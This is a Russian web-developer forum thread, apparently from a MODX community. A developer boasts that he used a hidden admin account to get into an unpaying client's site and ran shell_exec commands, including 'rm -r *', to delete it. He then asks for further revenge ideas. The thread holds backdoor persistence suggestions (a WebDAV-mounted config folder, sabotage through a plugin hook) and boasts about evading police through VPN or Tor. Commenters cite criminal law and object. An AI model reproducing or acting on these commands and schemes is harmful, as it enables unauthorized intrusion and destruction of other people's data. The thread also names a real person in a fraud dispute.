Идеи для веселья над должниками :-)
Всем привет! Кое-какие товарищи денег не заплатили за сайт и поэтому решил к чертям плоды своей работы у них удалить. Поскольку у меня есть аккаунт о котором они не знают, то я через него зашел в админку и в компоненте console запустил:
Я не знаю, как вы, но в этот момент я улыбнулся, подумав о том, что сис. админу тоже не заплатили :-) Пробежавшись по их серваку я узнал, что помимо моего сайта, там еще хостятся несколько других. Я ввел:
Собственно сайта нет, но вот мысль о том, что можно было придумать что-нибудь ориганальнее меня не покидает. Может кто-нибудь что-нибудь предложить? :-)
print '<pre>'.shell_exec('whoami').'</pre>';
Результатом было: nginxЯ не знаю, как вы, но в этот момент я улыбнулся, подумав о том, что сис. админу тоже не заплатили :-) Пробежавшись по их серваку я узнал, что помимо моего сайта, там еще хостятся несколько других. Я ввел:
shell_exec('cd ../../../../ && rm -r *');
*../../../../ — это путь к корневой папке моего сайта… Еле удержался, чтобы не добавить еще ../ и потереть им вообще все сайты.Собственно сайта нет, но вот мысль о том, что можно было придумать что-нибудь ориганальнее меня не покидает. Может кто-нибудь что-нибудь предложить? :-)
Комментарии: 22
Статья 272 УК РФ. Неправомерный доступ к компьютерной информации (действующая редакция)
[Уголовный кодекс] [Глава 28] [Статья 272]
1. Неправомерный доступ к охраняемой законом компьютерной информации, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование компьютерной информации, — наказывается штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев, либо исправительными работами на срок до одного года, либо ограничением свободы на срок до двух лет, либо принудительными работами на срок до двух лет, либо лишением свободы на тот же срок.
Это чтоб сильно весело не было
[Уголовный кодекс] [Глава 28] [Статья 272]
1. Неправомерный доступ к охраняемой законом компьютерной информации, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование компьютерной информации, — наказывается штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев, либо исправительными работами на срок до одного года, либо ограничением свободы на срок до двух лет, либо принудительными работами на срок до двух лет, либо лишением свободы на тот же срок.
Это чтоб сильно весело не было
Неправомерным считается доступ к конфиденциальной информации или информации, составляющей государственную тайну, лица, не обладающего необходимыми полномочиями (без согласия собственника или его законного представителя), при условии обеспечения специальных средств ее защиты.
Не подскажешь, какие нынче специальные средства защиты?
Ну и я уж промолчу о том, что у них в суде будут серьезные проблемы в плане предоставления доказательств…
Не подскажешь, какие нынче специальные средства защиты?
Ну и я уж промолчу о том, что у них в суде будут серьезные проблемы в плане предоставления доказательств…
Логин/пароль. Но это больше подходит под порчу имущества.
Коля, не тот ли который меня сбрил? ))
Ничего не знаю. Если бы у кого-то не была закрыта возможность писать в ВК сообщения, то…
Очень весело. Сам бесплатно поработал, сам свой труд удалил — отличный подход. Заодно еще, полагаю, и немало чужого труда улетело в трубу (не удивляюсь, если бэкапов нет).
Может, нужно как-то иначе рабочий процесс выстраивать?
Может, нужно как-то иначе рабочий процесс выстраивать?
Нет. Чужого кода не полетело. Хоть и хотелось взять на директорию ниже и грохнуть сайтов 10, но… Бэкапы думаю остались, но если ими воспользуются, то снова все удалю и поставлю статичный html с фразой «заплати деньги и будет счастье», либо в pdotools плагин на событие инициализации добавлю строчку, которая будет текущее время делить на 2 и когда остаток будет 1, то будет вызываться несуществующий метод, чтобы php с ошибкой заканчивал. Ну или банальный curl парсер страницы с моего домена с намёком оплаты.
Если все же доступы к админке он перекроет и востановит бээкап есть мысли как еще можно выпросить оплату?
Такое бывало часто) теперь без предоплаты не работаю и только на своем хостинге)
Такое бывало часто) теперь без предоплаты не работаю и только на своем хостинге)
Да мысли то есть, благо у этих ребят не закрыт доступ в папку core, но другой вопрос, что тратя время на уничтожение их сайта я тупо по баблу проигрываю в сравнении с текущими проектами. Мне выгоднее их делать, чем те деньги отбить пытаться.
Лучше книжки почитать про деловое общение, работу с дебиторской задолженностью контрагентов и тому подобное, пользы будет больше… и не работать с мудаками.
Вообще-то в данном тикете я не собирался жаловаться на сложности в работе с клиентами или об упущенных доходах. Я просто хотел посмотреть на варианты того, что можно сделать в ответ этим не хорошим товарищам:-)
Переадресацию на свой сайт, через MySQL.
Не вариант. Во-первых, аналогичного результата можно добиться через CURL, .htaccess и т.д. Во-вторых, не зачем создавать нагрузку лишнюю на свои базы.
Я тут подумал и мне пришла в голову забавная штука. На некоторых серваках имеется поддержка WebDAV и как следствие возможность создания «папки», чье содержимое будет расположено на облачном сервере, к примеру Яндекс.Диск. Соответственно, таким макаром можно на Яндекс.Диск залить какую-нибудь папку, вроде /core/conf и иметь постоянную возможность для ее редактирования.
Я тут подумал и мне пришла в голову забавная штука. На некоторых серваках имеется поддержка WebDAV и как следствие возможность создания «папки», чье содержимое будет расположено на облачном сервере, к примеру Яндекс.Диск. Соответственно, таким макаром можно на Яндекс.Диск залить какую-нибудь папку, вроде /core/conf и иметь постоянную возможность для ее редактирования.
Читаю и тихо охреневаю. Николай, вы серьезно считаете, что если найдете способ «отомстить», и сделаете это, то кроме веселья больше ничего не получите?
Заказчику достаточно только написать заявление. Если у опера будет какой-то интерес, то он быстро нароет нужные доказательства (а этим постом вы сильно упростите ему задачу) и возбудит уголовное дело. Интересом может быть план по статье, карьерный рост, а может и личная заинтересованность. Проведут обыск, изымут компьютеры и прочие «средства».
Если дело дойдет до суда — то с вероятностью 99,64% приговор будет обвинительный. Учитывая положительные характеристики и отсутствие прошлой судимости, скорее всего, дадут условный срок.
Заказчику достаточно только написать заявление. Если у опера будет какой-то интерес, то он быстро нароет нужные доказательства (а этим постом вы сильно упростите ему задачу) и возбудит уголовное дело. Интересом может быть план по статье, карьерный рост, а может и личная заинтересованность. Проведут обыск, изымут компьютеры и прочие «средства».
Если дело дойдет до суда — то с вероятностью 99,64% приговор будет обвинительный. Учитывая положительные характеристики и отсутствие прошлой судимости, скорее всего, дадут условный срок.
Прикинь, да! Ничего, кроме веселья не получаю. Я по факту еще вчера забил на тот сайт и просто развлекаюсь придумывая наиболее извращенные варианты, хотя он из бэкапов поднят.
И я все это пишу к тому, что ребят, не знаете, не пишите чушь.
Заказчику достаточно только написать заявление. Если у опера будет какой-то интерес, то он быстро нароет нужные доказательства (а этим постом вы сильно упростите ему задачу) и возбудит уголовное дело.На будущее: подобными делами занимаются не оперы, а «Управление К». Соответственно, в данном случае необходимо подать заявление о совершении по отношению к ним кибер преступления (ну или как там точно называется удаление сайта).
Проведут обыск, изымут компьютерыПфффф… Ну это вообще смешно. На хрена им изымать компьютер? Что они интересно смогут найти на нем такого, что будет подтверждением того, что я являюсь исполнителем? В данном случае не документы левые и черная бухгалтерия ищется…
и прочие «средства»Боюсь представить, что это за «средства». Разве что браузер приходит в голову.
Если дело дойдет до суда — то с вероятностью 99,64% приговор будет обвинительный. Учитывая положительные характеристики и отсутствие прошлой судимости, скорее всего, дадут условный срок.
Откуда статистика такая? Сам придумал? Или в кино насмотрелся? Я тебя разочарую, но если я все делал через VPN или в браузере TOR или в Мозилле Фокус, то шансов 0. Хотя даже если и другой, то шансов все равно 0.И я все это пишу к тому, что ребят, не знаете, не пишите чушь.
Ну, если вы так дела с клиентами ведете, как сейчас мне ответили, то все понятно. Если что, мы лично не знакомы, «тыкать» мне не нужно.
подобными делами занимаются не оперы, а «Управление К».А в этом управлении дела уборщицы что-ли ведут?
На хрена им изымать компьютер?Потому что это стандартная практика. Даже если ничего не найдут, без компа на несколько месяцев останетесь.
Откуда статистика такая? Сам придумал?www.novayagazeta.ru/articles/2017/08/11/73453-pered-kem-vy-opravdyvaetes
Я тебя разочарую, но если я все делал через VPN или в браузере TOR или в Мозилле Фокус, то шансов 0.Ага. Неуловимый хакер.
modx.pro/work/15289/
Просто оставлю это здесь.
Просто оставлю это здесь.
Да уже все его знают))) Поэтому не удивительно
Последний раз писал, что Telegram заблокировали и он им пользоваться не может
Я тебя разочарую, но если я все делал через VPN или в браузере TOR или в Мозилле Фокус, то шансов 0. Хотя даже если и другой, то шансов все равно 0.Странно, что Василий этому хацкеру еще не закрыл доступ тикеты строчить.
Отмечусь, так как именно я пострадал финансово от данного лица — Волкова Николая (Дмитриевича).
Sergey Chizhikov, [16.03.18 12:26]
Ну и с разработчиком хочется найти того, у кого есть опыт, отзывы )) ну и самое главное кто не бросит на половине дороги.
Николай Волков Modxpro, [16.03.18 12:28]
[In reply to Sergey Chizhikov]
Ну тут вопрос только в цену упирается на самом деле.
Николай Волков Modxpro, [16.03.18 12:30]
Если бюджет нормальный, то лично у меня не было бы никакого желания соскакивать на половине пути
Sergey Chizhikov, [16.03.18 12:26]
Ну и с разработчиком хочется найти того, у кого есть опыт, отзывы )) ну и самое главное кто не бросит на половине дороги.
Николай Волков Modxpro, [16.03.18 12:28]
[In reply to Sergey Chizhikov]
Ну тут вопрос только в цену упирается на самом деле.
Николай Волков Modxpro, [16.03.18 12:30]
Если бюджет нормальный, то лично у меня не было бы никакого желания соскакивать на половине пути
Оставлю здесь и продублирую в ветке, где писал, что Волков Николай не выполнил работу, получил предоплату. Сумма достаточно крупная и я думаю, что просто так оставить это я не могу. Николай, если делаете вид, что не читаете остальные каналы связи, отключили телефон, то считайте, что здесь официальное уведомление (продублировал в telegram, whatsapp, vk, sms). Если предоплату не вернете — подаем заявление в полицию.
Авторизуйтесь или зарегистрируйтесь, чтобы оставлять комментарии.